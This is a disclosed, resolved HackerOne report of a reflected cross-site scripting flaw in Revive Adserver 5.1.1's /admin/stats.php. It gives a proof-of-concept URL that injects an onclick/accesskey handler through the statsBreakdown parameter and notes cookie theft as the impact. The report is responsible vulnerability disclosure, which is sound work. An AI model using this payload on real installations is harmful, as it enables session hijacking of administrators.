Reflected XSS on /admin/stats.php

Disclosed: 2021-03-16 15:08:42 By solov9ev To revive_adserver
Medium
Vulnerability Details
Linked to the report [https://hackerone.com/reports/1083376](https://hackerone.com/reports/1083376) I found a reflected XSS attack on `/admin/stats.php`. Revive-Adserver version is `revive-adserver-5.1.1`. ### This time I found the parameter `statsBreakdown` - Go to `http://revive-adserver.loc/admin/stats.php?statsBreakdown=day%27%20onclick=alert(document.domain)%20accesskey=X%20&listorder=key&orderdirection=up&day=&setPerPage=15&entity=global&breakdown=history&period_preset=last_month&period_start=01+December+2020&period_end=31+December+2020` - For the payload to be executed, the user needs to press the access key combination for the hidden input field (for Firefox, Alt+Shift+X, see [this](https://developer.mozilla.org/en-US/docs/Web/HTML/Global_attributes/accesskey) for other browsers). {F1186275} ## Impact With this vulnerability, an attacker can for example steal users cookies or redirect users on malicious website.
Actions
View on HackerOne
Report Stats
  • Report ID: 1097217
  • State: Closed
  • Substate: resolved
  • Upvotes: 9
Share this report